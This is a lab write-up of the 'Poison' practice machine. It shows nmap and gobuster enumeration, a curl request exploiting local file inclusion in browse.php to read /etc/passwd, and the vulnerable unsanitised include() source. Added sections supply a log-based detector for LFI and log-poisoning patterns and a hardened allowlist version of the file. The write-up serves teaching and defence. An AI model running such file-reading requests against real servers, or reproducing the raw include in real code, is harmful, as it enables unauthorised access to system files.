10.10.10.84 - Poison - LFI (Log Poisoning)
Summary:
vulnerable software: Misconfiguration of PHP/5.6.32, LFI
system vulnerable: 10.10.10.84
vulnerability explanation: Local file inclusion in the browse.php file.
severity: critical
Enumeration:
```
====================================================================================
RUNNING NMAP TCP PORT ANALYSIS
====================================================================================

[+] Running only TCP port scan

Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-01 22:05 GMT
Nmap scan report for 10.10.10.84
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (93%), FreeBSD 9.1-STABLE (91%), FreeBSD 12.0-CURRENT (90%), FreeBSD 7.0-RELEASE (90%), FreeBSD 7.0-RELEASE-p2 - 7.1-PRERELEASE (89%), FreeNAS 9.10 (FreeBSD 10.3-STABLE) (89%), Sony Playstation 4 or FreeBSD 10.2-RELEASE (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.29 seconds
```
The URL http://10.10.10.84/browse.php?file=listfiles.php lists a few files on the server, indicating that the *.php and *.txt file extensions are in use:
The file info.php reveals the OS version, which will become important later on (nmap's OS detection was accurate):
```
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
```
The file phpinfo.php exposes the PHP 5.6.32 configuration:
The dangerous setting allow_url_fopen is enabled, which suggests the possibility of LFI.
Directory discovery:
```
└──╼ $gobuster -u http://10.10.10.84/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -x php

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.84/
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/02/01 22:16:44 Starting gobuster
=====================================================
/index.php (Status: 200)
/info.php (Status: 200)
/browse.php (Status: 200)
/phpinfo.php (Status: 200)
=====================================================
2019/02/01 22:23:11 Finished
=====================================================
```
Vulnerability exploitation:
Since allow_url_fopen was set to on, we could check for an LFI vulnerability; in this case an attacker could include the local file /etc/passwd:
```
└──╼ $curl -k http://10.10.10.84/browse.php?file=/etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
```
A Local File Inclusion vulnerability can be pushed quite far under the right conditions:
LFI -> RCE through PHPinfo.php
LFI -> RCE through Apache Log Poisoning
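As an added example that is not part of the original write-up, the PHP script below flags, in Apache combined-format access log entries, the two request patterns behind the escalation paths listed above: LFI probes on the file= parameter (absolute paths, traversal, stream wrappers, requests for log files) and PHP tags planted in the User-Agent, which is the write half of log poisoning. The log lines are constructed for this example, not captured from the box.

```php
<?php
// Added example (not part of the original write-up): flag LFI probes and
// log-poisoning attempts in Apache combined-format access log lines.
function classifyLogLine(string $line): array
{
    $flags = [];
    // Pull the request target and the User-Agent out of the combined format.
    $re = '/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+" \d{3} \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return $flags;
    }
    $target = urldecode($m[1]);
    $userAgent = $m[2];

    // Value of the file= parameter: the sink the vulnerable include() reads.
    parse_str((string) parse_url($target, PHP_URL_QUERY), $params);
    $file = isset($params['file']) ? (string) $params['file'] : '';

    if ($file !== '' && $file[0] === '/') {
        $flags[] = 'lfi: absolute path';            // e.g. file=/etc/passwd
    }
    if (strpos($file, '../') !== false) {
        $flags[] = 'lfi: directory traversal';
    }
    if (preg_match('#^(php|data|expect|phar)://#i', $file)) {
        $flags[] = 'lfi: stream wrapper';
    }
    if (stripos($file, 'log') !== false) {
        $flags[] = 'lfi: log file requested';       // read half of log poisoning
    }
    // PHP tags in the User-Agent or request line are the write half.
    if (preg_match('/<\?(php|=)/i', $userAgent . ' ' . $target)) {
        $flags[] = 'log poisoning: PHP tag written into the log';
    }
    return $flags;
}

// Constructed sample log lines (not captured from the box).
$sampleLog = [
    '10.10.14.2 - - [01/Feb/2019:22:30:01 +0000] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [01/Feb/2019:22:31:10 +0000] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 2105 "-" "curl/7.64.0"',
    '10.10.14.2 - - [01/Feb/2019:22:32:45 +0000] "GET / HTTP/1.1" 200 100 "-" "<?php /* constructed marker */ ?>"',
    '10.10.14.2 - - [01/Feb/2019:22:33:02 +0000] "GET /browse.php?file=../../../../var/log/httpd-access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
];

foreach ($sampleLog as $line) {
    $flags = classifyLogLine($line);
    echo ($flags ? 'ALERT: ' . implode('; ', $flags) : 'ok') . '  ' . $line . PHP_EOL;
}
```

The first sample line comes back as ok; the other three are flagged, and the last one shows why a single request can trip both the traversal and the log-file rule at once.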
Source code of the vulnerable browse.php file:
```
[email protected]:/usr/local/www/apache24/data % cat browse.php
<?php
include($_GET['file']);
?>
```
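For contrast, here is a hardened replacement for that file, written as an added example rather than the box's own code: it only includes names from a fixed allowlist and then re-checks the resolved path against a base directory. The ./pages directory and the three page names are assumptions for the example.

```php
<?php
// Added example, not the box's own code: a hardened replacement for the
// browse.php shown above. The original passes $_GET['file'] straight to
// include(), so any readable file on the host ends up in the interpreter.

// Assumption: the pages the application may serve live in ./pages.
$baseDir = realpath(__DIR__ . '/pages');
if ($baseDir === false) {
    http_response_code(500);
    exit('Page directory missing');
}

// Allowlist of page names the application actually offers. Anything not
// listed here (e.g. /etc/passwd, Apache logs, php:// wrappers) is refused
// before the filesystem is touched.
$allowed = ['index.php', 'listfiles.php', 'info.php'];

$requested = isset($_GET['file']) ? (string) $_GET['file'] : '';
if (!in_array($requested, $allowed, true)) {
    http_response_code(400);
    exit('Invalid file parameter');
}

// Defence in depth: resolve the final path and confirm it is still inside
// $baseDir, so an allowlist mistake cannot be turned into traversal.
$target = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
if ($target === false || strpos($target, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(404);
    exit('Not found');
}

include $target;
```

Pair this with allow_url_include = Off in php.ini (and allow_url_fopen = Off where the application does not need it) so that URL inclusion is also disabled at the interpreter level.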